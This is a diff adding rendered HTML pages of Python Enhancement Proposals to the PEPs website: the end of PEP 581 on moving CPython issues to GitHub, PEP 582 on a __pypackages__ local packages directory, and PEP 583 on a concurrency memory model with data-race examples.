Had we migrated to GitLab instead of GitHub in 2017, this PEP would have been +titled “Using GitLab Issues for CPython”.

+
+
+

Why not another issue tracker?

+

Using another issue tracker would require yet another learning curve: having to learn and get used to a different interface. We’ll also need to figure out how to build the integrations with GitHub.

+

By using GitHub issues, where the CPython source code is currently hosted and where pull requests are taking place, we’ll be providing a consistent experience to contributors and maintainers, while not having to jump from one interface to another.

+
+
+

Why not focus on improving Roundup / bpo?

+

GitHub has many features we like that are already available. We still need to +build out additional integrations and update our bots, but this is something +we already know how to do.

+

In order to really improve Roundup / bpo, it needs to first migrate to GitHub +and add CI and bots. As I understand it, there is hesitation because upstream +Roundup is still in Mercurial. Someone more familiar with Roundup / bpo needs +to champion this effort. (I’m not volunteering, I’m sorry).

+

I believe the effort of creating and maintaining GitHub integrations and bots +is much less than the effort needed to get Roundup up to speed and then to +continue maintaining it.

+
+
+

Downsides of GitHub

+

GitHub is not the perfect issue tracker. There are several issues we need to be aware of:

+
    +
  • Fear of uncertainty and vendor lock-in. GitHub is proprietary and there is a risk of vendor lock-in. However, this is an existing problem, since CPython’s codebase is already on GitHub, and it is not a problem unique to CPython. As a precautionary step, CPython’s repository on GitHub has been backed up on a daily basis since June 2018. [15]
  • +
  • Bot maintenance costs money and also takes up volunteer time. We would be shifting the maintenance burden from Roundup to the bots. At the very least, so far we’ve been able to address any bugs/issues related to the bots/GitHub APIs rather quickly, in a matter of days instead of months or years. The GitHub APIs are extensive and are used not only by CPython’s bots but also by the wider Python community, which makes them more approachable than maintaining Roundup/bpo.
  • +
  • Using GitHub could possibly increase the triaging effort. This was first raised as a Zulip topic [16], and also brought up during the core Python sprint in September 2018 [17]. A few solutions have been proposed and considered, such as creating a special triage team [18]. After PEP 581’s acceptance, GitHub released a new triaging role, currently in beta. The PSF has been in touch with GitHub to have this enabled for the Python organization. This is pending GitHub’s review [19].
  • +
  • Using GitHub could make it easier for people to post disruptive or spammy comments. It is true that there have been incidents where core developers had to moderate and lock disruptive discussions on GitHub. Thankfully, GitHub’s interface makes it easy for core developers to moderate discussions. In addition, incidents can be escalated to GitHub.
  • +
  • Manually editing issue templates can be cumbersome and error-prone. However, for most people, creating issues on GitHub will be a much better experience than creating issues on bpo. bpo’s numerous fields and text boxes can be confusing and intimidating to a newcomer, and it is not possible to “edit” a message there. On GitHub, the issue creator can preview their submission and edit their mistakes after posting.
  • +
  • bpo uses a number of fields to specify metadata, and these might not be easily transferable to GitHub. The intended way to handle custom metadata on GitHub is by using labels. The details of which labels to create will be further discussed in PEP 588.
  • +
+
+
+

Further questions and discussions

+

You can post questions on Discourse under the +Core-Workflow category.

+
+
+

Acknowledgements

+

Thanks to Guido van Rossum, Brett Cannon, and Alyssa Coghlan, who were consulted +in the early stage and research of this PEP. Their feedback, concerns, input, +and ideas have been valuable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0581.rst

+

Last modified: 2024-06-02 04:57:49 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0582/index.html b/pep-0582/index.html new file mode 100644 index 00000000000..350ae9a53bf --- /dev/null +++ b/pep-0582/index.html @@ -0,0 +1,445 @@ PEP 582 – Python local packages directory | peps.python.org
+
+


+ + +
+
+
+

PEP 582 – Python local packages directory

+
+
Author:
+
Kushal Das <mail at kushaldas.in>, Steve Dower <steve.dower at python.org>, +Donald Stufft <donald at stufft.io>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-May-2018
+
Python-Version:
+
3.12
+
Post-History:
+
01-Mar-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes extending the existing mechanism for setting up sys.path +to include a new __pypackages__ directory, in addition to the existing +locations. The new directory will be added at the start of sys.path, after +the current working directory and just before the system site-packages, to give +packages installed there priority over other locations.

+

This is similar to the existing mechanism of adding the current directory (or +the directory the script is located in), but by using a subdirectory, +additional libraries are kept separate from the user’s work.

+
+
+

Motivation

+

New Python programmers can benefit from being taught the value of isolating an +individual project’s dependencies from their system environment. However, the +existing mechanism for doing this, virtual environments, is known to be complex +and error-prone for beginners to understand. Explaining virtual environments is +often a distraction when trying to get a group of beginners set up - differences +in platform and shell environments require individual assistance, and the need +for activation in every new shell session makes it easy for students to make +mistakes when coming back to work after a break. This proposal offers a lightweight +solution that gives isolation without the user needing to understand more +advanced concepts.

+

Furthermore, standalone Python applications usually need 3rd party libraries to +function. Typically, they are either designed to be run from a virtual environment, +where the dependencies are installed into the environment alongside the application, +or they bundle their dependencies in a subdirectory, and modify sys.path at +application startup. Virtual environments, while a common and effective solution +(used, for example, by the pipx tool), are somewhat awkward to set up and manage, +and are not relocatable. On the other hand, manual manipulation of sys.path is +boilerplate that developers need to get right, and (being a runtime behaviour) +it is not understood by tools like linters and type checkers. The __pypackages__ +proposal formalises the idea of a “bundled dependencies” location, avoiding the +boilerplate and providing a standard location that development tools can be taught +to recognise.

+

It should be noted that in general, Python libraries cannot be simply copied +between machines, platforms, or even necessarily between Python versions. This +proposal does nothing to change that fact, and while it is tempting to assume +that bundling a script and its __pypackages__ is a mechanism for +distributing applications, this is explicitly not a goal of this proposal. +Developers remain responsible for the portability of their code.

+
+
+

Rationale

+

While sys.path can be manipulated at runtime, the default value is important, as +it establishes a common baseline that users and tools can agree on. The current default +does not include a location that could be viewed as “private to the current project”, +and yet that is a useful concept.

+

This is similar to the npm node_modules directory, which is popular in the +Javascript community, and something that developers familiar with that +ecosystem often ask for from Python.

+
+
+

Specification

+

This PEP proposes to add a new step in the process of calculating sys.path at +startup.

+

When the interactive interpreter starts, if a __pypackages__ directory is +found in the current working directory, then it will be included in +sys.path after the entry for current working directory and just before the +system site-packages.

+

When the interpreter runs a script, Python will try to find __pypackages__ +in the same directory as the script. If found (along with the current Python +version directory inside), then it will be used, otherwise Python will behave +as it does currently.

+

The behaviour should work exactly the same as the way the existing mechanism +for adding the current working directory or script directory to sys.path +works. For example, __pypackages__ will be ignored if the -P option or +the PYTHONSAFEPATH environment variable is set.

+

In order to be recognised, the __pypackages__ directory must be laid out +according to a new localpackages scheme in the sysconfig module. +Specifically, both of the purelib and platlib directories must be +present, using the following code to determine the locations of those +directories:

+
scheme = "localpackages"
+purelib = sysconfig.get_path("purelib", scheme, vars={"base": "__pypackages__", "platbase": "__pypackages__"})
+platlib = sysconfig.get_path("platlib", scheme, vars={"base": "__pypackages__", "platbase": "__pypackages__"})
+
+
+

These two locations will be added to sys.path; other directories or files in the __pypackages__ directory will be silently ignored. The paths are based on the Python version.
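
To make the intended lookup concrete, here is a rough pure-Python approximation (not part of the PEP’s reference code; the path layout is hand-built here because the proposed localpackages scheme was never actually added to sysconfig):

import os
import sys

def pypackages_paths(base_dir):
    # Hand-built stand-in for the proposed "localpackages" scheme
    # (Unix-style layout; on Windows the subdirectories would differ).
    ver = f"{sys.version_info.major}.{sys.version_info.minor}"
    candidate = os.path.join(base_dir, "__pypackages__", "lib",
                             f"python{ver}", "site-packages")
    return [candidate] if os.path.isdir(candidate) else []

# Hypothetical bootstrap step: insert just after sys.path[0] (the
# script or current directory), ahead of the system site-packages.
for path in pypackages_paths(os.getcwd()):
    if path not in sys.path:
        sys.path.insert(1, path)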

+
+

Note

+

There is a possible option of having a separate new API; it is documented at issue #3013.

+
+
+

Example

+

The following shows an example project directory structure, and different ways the Python executable and any script will behave. The example is for Unix-like systems; on Windows, the subdirectories will be different.

+
foo
+    __pypackages__
+        lib
+            python3.10
+                site-packages
+                    bottle
+    myscript.py
+
+/> python foo/myscript.py
+sys.path[0] == 'foo'
+sys.path[1] == 'foo/__pypackages__/lib/python3.10/site-packages/'
+
+
+cd foo
+
+foo> /usr/bin/ansible
+    #! /usr/bin/env python3
+foo> python /usr/bin/ansible
+
+foo> python myscript.py
+
+foo> python
+sys.path[0] == '.'
+sys.path[1] == './__pypackages__/lib/python3.10/site-packages'
+
+foo> python -m bottle
+
+
+

We have a project directory called foo and it has a __pypackages__ +inside of it. We have bottle installed in that +__pypackages__/lib/python3.10/site-packages/, and have a myscript.py +file inside of the project directory. We have used whatever tool we generally +use to install bottle in that location.
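
(As an aside, not part of the PEP: with current tools, a layout like this could be produced with something along the lines of pip install --target foo/__pypackages__/lib/python3.10/site-packages bottle.)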

+

For invoking a script, Python will try to find a __pypackages__ inside of the directory in which the script resides [1], /usr/bin here. The same happens in the last example, where we execute /usr/bin/ansible from inside of the foo directory. In both cases, it will not use the __pypackages__ in the current working directory.

+

Similarly, if we invoke myscript.py from the first example, it will use the +__pypackages__ directory that was in the foo directory.

+

If we go inside of the foo directory and start the Python executable (the interpreter), it will find the __pypackages__ directory inside of the current working directory and use it in sys.path. The same happens if we use -m to run a module. In our example, the bottle module will be found inside of the __pypackages__ directory.

+

The above two examples are the only cases where the __pypackages__ directory from the current working directory is used.

+

In another example scenario, a trainer of a Python class can say “Today we are going to learn how to use Twisted! To start, please check out our example project, go to that directory, and then run a given command to install Twisted.”

+

That will install Twisted into a directory separate from python3. There’s no +need to discuss virtual environments, global versus user installs, etc. as the +install will be local by default. The trainer can then just keep telling them to +use python3 without any activation step, etc.

+ +
+
+
+

Relationship to virtual environments

+

At its heart, this proposal is simply to modify the calculation of the default +value of sys.path, and does not relate at all to the virtual environment +mechanism. However, __pypackages__ can be viewed as providing an isolation +capability, and in that sense, it “competes” with virtual environments.

+

However, there are significant differences:

+
+
    +
  • Virtual environments are isolated from the system environment, whereas +__pypackages__ simply adds to the system environment.
  • +
  • Virtual environments include a full “installation scheme”, with directories +for binaries, C header files, etc., whereas __pypackages__ is solely +for Python library code.
  • +
  • Virtual environments work most smoothly when “activated”. This proposal +needs no activation.
  • +
+
+

This proposal should be seen as independent of virtual environments, not competing +with them. At best, some use cases currently only served by virtual environments +can also be served (possibly better) by __pypackages__.

+

It should be noted that libraries installed in __pypackages__ will be visible +in a virtual environment. This arguably breaks the isolation of virtual environments, +but it is no different in principle to the presence of the current directory on +sys.path (or mechanisms like the PYTHONPATH environment variable). The only +difference is in degree, as the expectation is that people will more commonly install +packages in __pypackages__. The alternative would be to explicitly detect virtual +environments and disable __pypackages__ in that case - however that would break +scripts with bundled dependencies. The PEP authors believe that developers using +virtual environments should be experienced enough to understand the issue and +anticipate and avoid any problems.

+
+
+

Security Considerations

+

In theory, it is possible to add a library to the __pypackages__ directory +that overrides a stdlib module or an installed 3rd party library. For the +__pypackages__ associated with a script, this is assumed not to be a +significant issue, as it is unlikely that anyone would be able to write to +__pypackages__ unless they also had the ability to write to the script itself.

+

For a __pypackages__ directory in the current working directory, the +interactive interpreter could be affected. However, this is not significantly +different than the existing issue of someone having a math.py module in their +current directory, and while (just like that case) it can cause user confusion, +it does not introduce any new security implications.

+

When running a script, any __pypackages__ directory in the current working +directory is ignored. This is the same approach Python uses for adding the +current working directory to sys.path and ensures that it is not possible +to change the behaviour of a script by modifying files in the current +directory.

+

Also, a __pypackages__ directory is only recognised in the current (or script) directory. The interpreter will not scan for __pypackages__ in parent directories. Doing so would open up the risk of security issues if directory permissions on parents differ. In particular, scripts in the bin directory of __pypackages__ (the scripts location in sysconfig terms) have no special access to the libraries installed in __pypackages__. Putting executable scripts in a bin directory is not supported by this proposal.

+
+
+

How to Teach This

+

The original motivation for this proposal was to make it easier to teach Python +to beginners. To that end, it needs to be easy to explain, and simple to use.

+

At the most basic level, this is similar to the existing mechanism where the +script directory is added to sys.path and can be taught in a similar manner. +However, for its intended use of “lightweight isolation”, it would likely be taught +in terms of “things you put in a __pypackages__ directory are private to your +script”. The experience of the PEP authors suggests that this would be significantly +easier to teach than the current alternative of introducing virtual environments.

+
+
+

Impact on Tools

+

As the intended use of the feature is to install 3rd party libraries in the new +directory, it is important that tools, particularly installers, understand how to +manage __pypackages__.

+

It is hoped that tools will introduce a dedicated “pypackages” installation +mode that is guaranteed to match the expected layout in all cases. However, +the question of how best to support the __pypackages__ layout is ultimately +left to individual tool maintainers to consider and decide on.

+

Tools that locate packages without actually running Python code (IDEs, linters, +type checkers, etc.) would need updating to recognise __pypackages__. In the +absence of such updates, the __pypackages__ directory would work similarly +to directories currently added to sys.path at runtime (i.e., the tool would +probably ignore it).

+
+
+

Backwards Compatibility

+

The directory name __pypackages__ was chosen because it is unlikely to be in +common use. It is true that users who have chosen to use that name for their own +purposes will be impacted, but at the time this PEP was written, this was viewed +as a relatively low risk.

+

Unfortunately, in the time this PEP has been under discussion, a number of tools +have chosen to implement variations on what is being proposed here, which are not +all compatible with the final form of the PEP. As a result, the risk of clashes is +now higher than originally anticipated.

+

It would be possible to mitigate this by choosing a different name, hopefully as +uncommon as __pypackages__ originally was. But realistically, any compatibility +issues can be viewed as simply the consequences of people trying to implement +draft proposals, without making the effort to track changes in the proposal. As such, +it seems reasonable to retain the __pypackages__ name, and put the burden of +addressing the compatibility issue on the tools that implemented the draft version.

+
+

Impact on other Python implementations

+

Other Python implementations will need to replicate the new behavior of the interpreter bootstrap, including locating the __pypackages__ directory and adding it to sys.path just before site-packages, if it is present. This is no different from any other Python change.

+
+
+
+

Reference Implementation

+

Here is a small script which enables the implementation for CPython and PyPy.

+
+
+

Rejected Ideas

+
    +
  • Alternative names, such as __pylocal__ and python_modules. Ultimately, the name is arbitrary and the chosen name is good enough.
  • +
  • Additional features of virtual environments. This proposal is not a replacement for virtual environments, and such features are therefore out of scope.
  • +
  • We will not scan any parent directory to find __pypackages__. If we want to execute scripts inside of the ~/bin/ directory, then the __pypackages__ directory must be inside of the ~/bin/ directory. Doing any such scan for __pypackages__ (for the interpreter or a script) will have security implications and also increase startup time.
  • +
  • Raise an error if unexpected files or directories are present in __pypackages__. This is considered too strict, particularly as transitional approaches like pip install --prefix can create additional files in __pypackages__.
  • +
  • Using a different sysconfig scheme, or a dedicated pypackages scheme. While this is attractive in theory, it makes transition harder, as there will be no readily-available way of installing to __pypackages__ until tools implement explicit support. And while the PEP authors hope and assume that such support would be added, having the proposal dependent on such support in order to be usable seems like an unacceptable risk.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0582.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0583/index.html b/pep-0583/index.html new file mode 100644 index 00000000000..1331f26cadc --- /dev/null +++ b/pep-0583/index.html @@ -0,0 +1,1087 @@ PEP 583 – A Concurrency Memory Model for Python | peps.python.org
+
+


+ + +
+
+
+

PEP 583 – A Concurrency Memory Model for Python

+
+
Author:
+
Jeffrey Yasskin <jyasskin at google.com>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
22-Mar-2008
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes how Python programs may behave in the presence of +concurrent reads and writes to shared variables from multiple threads. +We use a happens before relation to define when variable accesses +are ordered or concurrent. Nearly all programs should simply use locks +to guard their shared variables, and this PEP highlights some of the +strange things that can happen when they don’t, but programmers often +assume that it’s ok to do “simple” things without locking, and it’s +somewhat unpythonic to let the language surprise them. Unfortunately, +avoiding surprise often conflicts with making Python run quickly, so +this PEP tries to find a good tradeoff between the two.

+
+
+

Rationale

+

So far, we have 4 major Python implementations – CPython, Jython, +IronPython, and PyPy – as well as lots of minor ones. Some of +these already run on platforms that do aggressive optimizations. In +general, these optimizations are invisible within a single thread of +execution, but they can be visible to other threads executing +concurrently. CPython currently uses a GIL to ensure that other +threads see the results they expect, but this limits it to a single +processor. Jython and IronPython run on Java’s or .NET’s threading +system respectively, which allows them to take advantage of more cores +but can also show surprising values to other threads.

+

So that threaded Python programs continue to be portable between +implementations, implementers and library authors need to agree on +some ground rules.

+
+
+

A couple definitions

+
+
Variable
A name that refers to an object. Variables are generally +introduced by assigning to them, and may be destroyed by passing +them to del. Variables are fundamentally mutable, while +objects may not be. There are several varieties of variables: +module variables (often called “globals” when accessed from within +the module), class variables, instance variables (also known as +fields), and local variables. All of these can be shared between +threads (the local variables if they’re saved into a closure). +The object in which the variables are scoped notionally has a +dict whose keys are the variables’ names.
+
Object
A collection of instance variables (a.k.a. fields) and methods. +At least, that’ll do for this PEP.
+
Program Order
The order that actions (reads and writes) happen within a thread, +which is very similar to the order they appear in the text.
+
Conflicting actions
Two actions on the same variable, at least one of which is a write.
+
Data race
A situation in which two conflicting actions happen at the same +time. “The same time” is defined by the memory model.
+
+
+
+

Two simple memory models

+

Before talking about the details of data races and the surprising +behaviors they produce, I’ll present two simple memory models. The +first is probably too strong for Python, and the second is probably +too weak.

+
+

Sequential Consistency

+

In a sequentially-consistent concurrent execution, actions appear to +happen in a global total order with each read of a particular variable +seeing the value written by the last write that affected that +variable. The total order for actions must be consistent with the +program order. A program has a data race on a given input when one of +its sequentially consistent executions puts two conflicting actions +next to each other.

+

This is the easiest memory model for humans to understand, although it +doesn’t eliminate all confusion, since operations can be split in odd +places.

+
+
+

Happens-before consistency

+

The program contains a collection of synchronization actions, which +in Python currently include lock acquires and releases and thread +starts and joins. Synchronization actions happen in a global total +order that is consistent with the program order (they don’t have to +happen in a total order, but it simplifies the description of the +model). A lock release synchronizes with all later acquires of the +same lock. Similarly, given t = threading.Thread(target=worker):

+
    +
  • A call to t.start() synchronizes with the first statement in +worker().
  • +
  • The return from worker() synchronizes with the return from +t.join().
  • +
  • If the return from t.start() happens before (see below) a call +to t.isAlive() that returns False, the return from +worker() synchronizes with that call.
  • +
+

We call the source of the synchronizes-with edge a release operation +on the relevant variable, and we call the target an acquire operation.

+

The happens before order is the transitive closure of the program +order with the synchronizes-with edges. That is, action A happens +before action B if:

+
    +
  • A falls before B in the program order (which means they run in the +same thread)
  • +
  • A synchronizes with B
  • +
  • You can get to B by following happens-before edges from A.
  • +
+

An execution of a program is happens-before consistent if each read +R sees the value of a write W to the same variable such that:

+
    +
  • R does not happen before W, and
  • +
  • There is no other write V that overwrote W before R got a +chance to see it. (That is, it can’t be the case that W happens +before V happens before R.)
  • +
+

You have a data race if two conflicting actions aren’t related by +happens-before.

+
+

An example

+

Let’s use the rules from the happens-before model to prove that the +following program prints “[7]”:

+
class Queue:
+    def __init__(self):
+        self.l = []
+        self.cond = threading.Condition()
+
+    def get(self):
+        with self.cond:
+            while not self.l:
+                self.cond.wait()
+            ret = self.l[0]
+            self.l = self.l[1:]
+            return ret
+
+    def put(self, x):
+        with self.cond:
+            self.l.append(x)
+            self.cond.notify()
+
+myqueue = Queue()
+
+def worker1():
+    x = [7]
+    myqueue.put(x)
+
+def worker2():
+    y = myqueue.get()
+    print(y)
+
+thread1 = threading.Thread(target=worker1)
+thread2 = threading.Thread(target=worker2)
+thread2.start()
+thread1.start()
+
+
+
    +
  1. Because myqueue is initialized in the main thread before thread1 or thread2 is started, that initialization happens before worker1 and worker2 begin running, so there’s no way for either to raise a NameError, and both myqueue.l and myqueue.cond are set to their final objects.
  2. The initialization of x in worker1 happens before it calls myqueue.put(), which happens before it calls myqueue.l.append(x), which happens before the call to myqueue.cond.release(), all because they run in the same thread.
  3. In worker2, myqueue.cond will be released and re-acquired until myqueue.l contains a value (x). The call to myqueue.cond.release() in worker1 happens before that last call to myqueue.cond.acquire() in worker2.
  4. That last call to myqueue.cond.acquire() happens before myqueue.get() reads myqueue.l, which happens before myqueue.get() returns, which happens before print(y), again all because they run in the same thread.
  5. Because happens-before is transitive, the list initially stored in x in thread1 is initialized before it is printed in thread2.
+

Usually, we wouldn’t need to look all the way into a thread-safe +queue’s implementation in order to prove that uses were safe. Its +interface would specify that puts happen before gets, and we’d reason +directly from that.

+
+
+
+
+

Surprising behaviors with races

+

Lots of strange things can happen when code has data races. It’s easy to avoid all of these problems by just protecting shared variables with locks. This is not a complete list of race hazards; it’s just a collection of those that seem relevant to Python.

+

In all of these examples, variables starting with r are local +variables, and other variables are shared between threads.

+
+

Zombie values

+

This example comes from the Java memory model:

+
+
Initially p is q and p.x == 0.

Thread 1       Thread 2
r1 = p         r6 = p
r2 = r1.x      r6.x = 3
r3 = q
r4 = r3.x
r5 = r1.x
+

Can produce r2 == r5 == 0 but r4 == 3, proving that +p.x went from 0 to 3 and back to 0.

+
+

A good compiler would like to optimize out the redundant load of +p.x in initializing r5 by just re-using the value already +loaded into r2. We get the strange result if thread 1 sees memory +in this order:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Evaluation    Computes    Why
r1 = p
r2 = r1.x     r2 == 0
r3 = q        r3 is p
p.x = 3                   Side-effect of thread 2
r4 = r3.x     r4 == 3
r5 = r2       r5 == 0     Optimized from r5 = r1.x because r2 == r1.x.
+
+
+
+

Inconsistent Orderings

+

From N2177: Sequential Consistency for Atomics, and also known as +Independent Read of Independent Write (IRIW).

+
+
Initially, a == b == 0.

Thread 1    Thread 2    Thread 3    Thread 4
r1 = a      r3 = b      a = 1       b = 1
r2 = b      r4 = a
+

We may get r1 == r3 == 1 and r2 == r4 == 0, proving both +that a was written before b (thread 1’s data), and that +b was written before a (thread 2’s data). See Special +Relativity for a +real-world example.

+
+

This can happen if thread 1 and thread 3 are running on processors +that are close to each other, but far away from the processors that +threads 2 and 4 are running on and the writes are not being +transmitted all the way across the machine before becoming visible to +nearby threads.

+

Neither acquire/release semantics nor explicit memory barriers can +help with this. Making the orders consistent without locking requires +detailed knowledge of the architecture’s memory model, but Java +requires it for volatiles so we could use documentation aimed at its +implementers.

+
+
+

A happens-before race that’s not a sequentially-consistent race

+

From the POPL paper about the Java memory model [JMM-popl].

+
+
Initially, x == y == 0.

Thread 1       Thread 2
r1 = x         r2 = y
if r1 != 0:    if r2 != 0:
    y = 42         x = 42
+

Can r1 == r2 == 42???

+
+

In a sequentially-consistent execution, there’s no way to get an +adjacent read and write to the same variable, so the program should be +considered correctly synchronized (albeit fragile), and should only +produce r1 == r2 == 0. However, the following execution is +happens-before consistent:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Statement      Value    Thread
r1 = x         42       1
if r1 != 0:    true     1
    y = 42              1
r2 = y         42       2
if r2 != 0:    true     2
    x = 42              2
+
+

WTF, you are asking yourself. Because there were no inter-thread +happens-before edges in the original program, the read of x in thread +1 can see any of the writes from thread 2, even if they only happened +because the read saw them. There are data races in the +happens-before model.

+

We don’t want to allow this, so the happens-before model isn’t enough +for Python. One rule we could add to happens-before that would +prevent this execution is:

+
+
If there are no data races in any sequentially-consistent +execution of a program, the program should have sequentially +consistent semantics.
+

Java gets this rule as a theorem, but Python may not want all of the +machinery you need to prove it.

+
+
+

Self-justifying values

+

Also from the POPL paper about the Java memory model [JMM-popl].

+
+
Initially, x == y == 0.

Thread 1    Thread 2
r1 = x      r2 = y
y = r1      x = r2
+

Can x == y == 42???

+
+

In a sequentially consistent execution, no. In a happens-before +consistent execution, yes: The read of x in thread 1 is allowed to see +the value written in thread 2 because there are no happens-before +relations between the threads. This could happen if the compiler or +processor transforms the code into:

+
+
+ + + + + + + + + + + + + + + + + + + +
Thread 1        Thread 2
y = 42          r2 = y
r1 = x          x = r2
if r1 != 42:
    y = r1
+
+

It can produce a security hole if the speculated value is a secret +object, or points to the memory that an object used to occupy. Java +cares a lot about such security holes, but Python may not.

+
+
+

Uninitialized values (direct)

+

From several classic double-checked locking examples.

+
+
Initially, d == None.

Thread 1             Thread 2
while not d: pass    d = [3, 4]
assert d[1] == 4
+

This could raise an IndexError, fail the assertion, or, without +some care in the implementation, cause a crash or other undefined +behavior.

+
+

Thread 2 may actually be implemented as:

+
r1 = list()
+r1.append(3)
+r1.append(4)
+d = r1
+
+
+

Because the assignment to d and the item assignments are independent, +the compiler and processor may optimize that to:

+
r1 = list()
+d = r1
+r1.append(3)
+r1.append(4)
+
+
+

Which is obviously incorrect and explains the IndexError. If we then +look deeper into the implementation of r1.append(3), we may find +that it and d[1] cannot run concurrently without causing their own +race conditions. In CPython (without the GIL), those race conditions +would produce undefined behavior.

+

There’s also a subtle issue on the reading side that can cause the +value of d[1] to be out of date. Somewhere in the implementation of +list, it stores its contents as an array in memory. This array may +happen to be in thread 1’s cache. If thread 1’s processor reloads +d from main memory without reloading the memory that ought to +contain the values 3 and 4, it could see stale values instead. As far +as I know, this can only actually happen on Alphas and maybe Itaniums, +and we probably have to prevent it anyway to avoid crashes.

+
+
+

Uninitialized values (flag)

+

From several more double-checked locking examples.

+
+
Initially, d == dict() and initialized == False.

Thread 1                       Thread 2
while not initialized: pass    d['a'] = 3
r1 = d['a']                    initialized = True
r2 = r1 == 3
assert r2
+

This could raise a KeyError, fail the assertion, or, without some +care in the implementation, cause a crash or other undefined +behavior.

+
+

Because d and initialized are independent (except in the +programmer’s mind), the compiler and processor can rearrange these +almost arbitrarily, except that thread 1’s assertion has to stay after +the loop.

+
+
+

Inconsistent guarantees from relying on data dependencies

+

This is a problem with Java final variables and the proposed +data-dependency ordering in C++0x.

+
+
First execute:
g = []
+def Init():
+    g.extend([1,2,3])
+    return [1,2,3]
+h = None
+
+
+

Then in two threads:

+ + + + + + + + + + + + + + + + + +
Thread 1               Thread 2
while not h: pass      r1 = Init()
assert h == [1,2,3]    freeze(r1)
assert h == g          h = r1
+

If h has semantics similar to a Java final variable (except +for being write-once), then even though the first assertion is +guaranteed to succeed, the second could fail.

+
+

Data-dependent guarantees like those final provides only work if +the access is through the final variable. It’s not even safe to +access the same object through a different route. Unfortunately, +because of how processors work, final’s guarantees are only cheap when +they’re weak.

+
+
+
+

The rules for Python

+

The first rule is that Python interpreters can’t crash due to race +conditions in user code. For CPython, this means that race conditions +can’t make it down into C. For Jython, it means that +NullPointerExceptions can’t escape the interpreter.

+

Presumably we also want a model at least as strong as happens-before +consistency because it lets us write a simple description of how +concurrent queues and thread launching and joining work.

+

Other rules are more debatable, so I’ll present each one with pros and +cons.

+
+

Data-race-free programs are sequentially consistent

+

We’d like programmers to be able to reason about their programs as if +they were sequentially consistent. Since it’s hard to tell whether +you’ve written a happens-before race, we only want to require +programmers to prevent sequential races. The Java model does this +through a complicated definition of causality, but if we don’t want to +include that, we can just assert this property directly.

+
+
+

No security holes from out-of-thin-air reads

+

If the program produces a self-justifying value, it could expose +access to an object that the user would rather the program not see. +Again, Java’s model handles this with the causality definition. We +might be able to prevent these security problems by banning +speculative writes to shared variables, but I don’t have a proof of +that, and Python may not need those security guarantees anyway.

+
+
+

Restrict reorderings instead of defining happens-before

+

The .NET [CLR-msdn] and x86 [x86-model] memory models are based on defining which reorderings compilers may allow. I think that it’s easier to program to a happens-before model than to reason about all of the possible reorderings of a program, and it’s easier to insert enough happens-before edges to make a program correct, than to insert enough memory fences to do the same thing. So, although we could layer some reordering restrictions on top of the happens-before base, I don’t think Python’s memory model should be entirely reordering restrictions.

+
+
+

Atomic, unordered assignments

+

Assignments of primitive types are already atomic. If you assign +3<<72 + 5 to a variable, no thread can see only part of the value. +Jeremy Manson suggested that we extend this to all objects. This +allows compilers to reorder operations to optimize them, without +allowing some of the more confusing uninitialized values. The +basic idea here is that when you assign a shared variable, readers +can’t see any changes made to the new value before the assignment, or +to the old value after the assignment. So, if we have a program like:

+
+
Initially, (d.a, d.b) == (1, 2), and (e.c, e.d) == (3, 4).
We also have class Obj(object): pass.

Thread 1      Thread 2
r1 = Obj()    r3 = d
r1.a = 3      r4, r5 = r3.a, r3.b
r1.b = 4      r6 = e
d = r1        r7, r8 = r6.c, r6.d
r2 = Obj()
r2.c = 6
r2.d = 7
e = r2
+

(r4, r5) can be (1, 2) or (3, 4) but nothing else, and +(r7, r8) can be either (3, 4) or (6, 7) but nothing +else. Unlike if writes were releases and reads were acquires, +it’s legal for thread 2 to see (e.c, e.d) == (6, 7) and (d.a, +d.b) == (1, 2) (out of order).

+
+

This allows the compiler a lot of flexibility to optimize without +allowing users to see some strange values. However, because it relies +on data dependencies, it introduces some surprises of its own. For +example, the compiler could freely optimize the above example to:

+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Thread 1      Thread 2
r1 = Obj()    r3 = d
r2 = Obj()    r6 = e
r1.a = 3      r4, r7 = r3.a, r6.c
r2.c = 6      r5, r8 = r3.b, r6.d
r2.d = 7
e = r2
r1.b = 4
d = r1
+
+

As long as it didn’t let the initialization of e move above any of +the initializations of members of r2, and similarly for d and +r1.

+

This also helps to ground happens-before consistency. To see the +problem, imagine that the user unsafely publishes a reference to an +object as soon as she gets it. The model needs to constrain what +values can be read through that reference. Java says that every field +is initialized to 0 before anyone sees the object for the first time, +but Python would have trouble defining “every field”. If instead we +say that assignments to shared variables have to see a value at least +as up to date as when the assignment happened, then we don’t run into +any trouble with early publication.

+
+
+

Two tiers of guarantees

+

Most other languages with any guarantees for unlocked variables +distinguish between ordinary variables and volatile/atomic variables. +They provide many more guarantees for the volatile ones. Python can’t +easily do this because we don’t declare variables. This may or may +not matter, since python locks aren’t significantly more expensive +than ordinary python code. If we want to get those tiers back, we could:

+
    +
  1. Introduce a set of atomic types similar to Java’s [5] or C++’s [6]. Unfortunately, we couldn’t assign to them with =.
  2. Without requiring variable declarations, we could also specify that all of the fields on a given object are atomic.
  3. Extend the __slots__ mechanism [7] with a parallel __volatiles__ list, and maybe a __finals__ list (a rough sketch of this spelling follows the list).
+
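
A rough sketch of how option 3 might be spelled (both __volatiles__ and __finals__ are hypothetical names; no Python implementation supports them):

class Point:
    __slots__ = ("x", "y")
    # Hypothetical declarations: fields listed here would get
    # volatile/final semantics under this option.
    __volatiles__ = ("x",)
    __finals__ = ("y",)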
+
+

Sequential Consistency

+

We could just adopt sequential consistency for Python. +This avoids all of the hazards mentioned above, +but it prohibits lots of optimizations too. +As far as I know, this is the current model of CPython, +but if CPython learned to optimize out some variable reads, +it would lose this property.

+

